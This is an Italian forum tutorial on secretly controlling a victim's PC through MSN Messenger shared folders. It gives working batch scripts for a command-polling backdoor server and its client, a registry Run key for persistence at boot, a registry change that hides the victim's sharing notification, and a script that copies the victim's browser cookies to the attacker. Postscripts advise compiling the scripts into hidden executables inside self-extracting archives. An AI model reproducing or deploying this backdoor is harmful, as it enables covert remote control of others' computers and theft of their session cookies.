Ecco come controllare un PC tramite msn e una cartella condivisa con la vittima
prima di tutto questi sono i 2bat principali, server e client:
server:
CODICE
CD "%¬userprofile% Impost~1Dati applicazioniMicrosoftMessengerVITTIMASharing FoldersATTACKER"
:1
IF EXIST comandi.xcom (goto 3) else (goto 2)
:2
ping 127.0.0.1 -n 10 -w 1000
goto 1
:3
MOVE /Y comandi.xcom %¬systemroot% system32comandi.bat
start %¬systemroot% system32comandi.bat
GOTO 1
EXIT
client:
CODICE
@echo off
:1
ECHO Inserire utente a cui inviare i comandi
set /P x=
ECHO Digitare i comandi e poi premere ctrl+z quando si ha finito.
COPY con comandi.xcom
MOVE comandi.xcom "%¬userprofile% Impost~1Dati applicazioniMicrosoftMessengerATTACKERSharing Folders%¬x%"
goto 1
queste sn le 2bat principali..se poi volete potete crearne 1altra x far eseguire il server a ogni boot:
CODICE
REG ADD HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v NOME_CHIAVE /t REG_SZ /d PERCORSO_SERVERNOME_SERVER /f
poi..visto che ogni volta ke eseguiamo un comando, la vittima riceve una notifica riguardo la cartella condivisa..disabilitiamo la notifica!
x farlo abbiamo bisogno di manovrare 1po' sul registro.
esportiamo l'elenco delle kiavi ke ci interessano cn qst comando:
CODICE
cd "%¬userprofile% Impost~1Dati applicazioniMicrosoftMessengerVITTIMASharing FoldersATTACKER"
reg export HKEY_CURRENT_USERSoftwareMicrosoftMSNMessengerPerPassportSettings kiave.txt
dovremmo avere una cosa del genere:
CODICE
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USERSoftwareMicrosoftMSNMessengerPerPassportSettings100568147]
"DefaultSignInState"=dword:00000006
"UTL"=hex:3c,00,6d,00,73,00,6e,00,6f,00,62,00,6a,00,20,00,43,00,72,00,65,00,61,
00,74,00,6f,00,72,00,3d,00,22,00,70,00,69,00,63,00,63,00,6f,00,6c,00,61,00,
6d,00,69,00,73,00,73,00,39,00,30,00,40,00,79,00,61,00,68,00,6f,00,6f,00,2e,
00,69,00,74,00,22,00,20,00,54,00,79,00,70,00,65,00,3d,00,22,00,33,00,22,00,
........................
..........................
[HKEY_CURRENT_USERSoftwareMicrosoftMSNMessengerPerPassportSettings100568147<--NUMERO-ID]
probabilmente troverete diversi ID..x sapere qual'è quello giusto provare a cerkare (CTRL+F) l'indirizzo email, o parte del nick e se la vittima ha configurato, non so, la cartella dove è salvata la cronologia, o le conversazioni, o qlkosa del genere, troverete qlke riferimento..quindi scorrete in alto e vedete a quale sottochiave appartiene il valore.
una volta trovato L'ID il comando x disabilitare la notifica poi è:
CODICE
reg add HKEY_CURRENT_USERSoftwareMicrosoftMSNMessengerPerPassportSettingsNUMEROID /v isFileSharingToastAllowed /f /d 0 /t REG_DWORD
a questo punto avete campo libero..qualche piccolo comando utile:
Rubare Cookies:
HTML
@echo off
cd %¬userprofile% Impost~1Dati applicazioniMicrosoftMessengerVITTIMASharing FoldersATTACKER
md cookie
copy "%¬userprofile%cookies*.*" cookie
exit
P.S. ricordatevi sempre @echo off e exit, se volete rendere il comando invisibile
P.P.S. Fatevi furbi..servitevi di archivi autoestraenti e compilate le bat in exe in modalità ghost
P.P.P.S. Non create 1000000bat da inviare alla vittima..basta solo ke la vittima lanci il server, tutto al + cn la bat ke aggiunge la kiave x l'esecuzione automatica al registro...il resto dei comandi li lanciate da remoto.
CITAZIONE
Per supporto, rivolgersi in
questo topic.
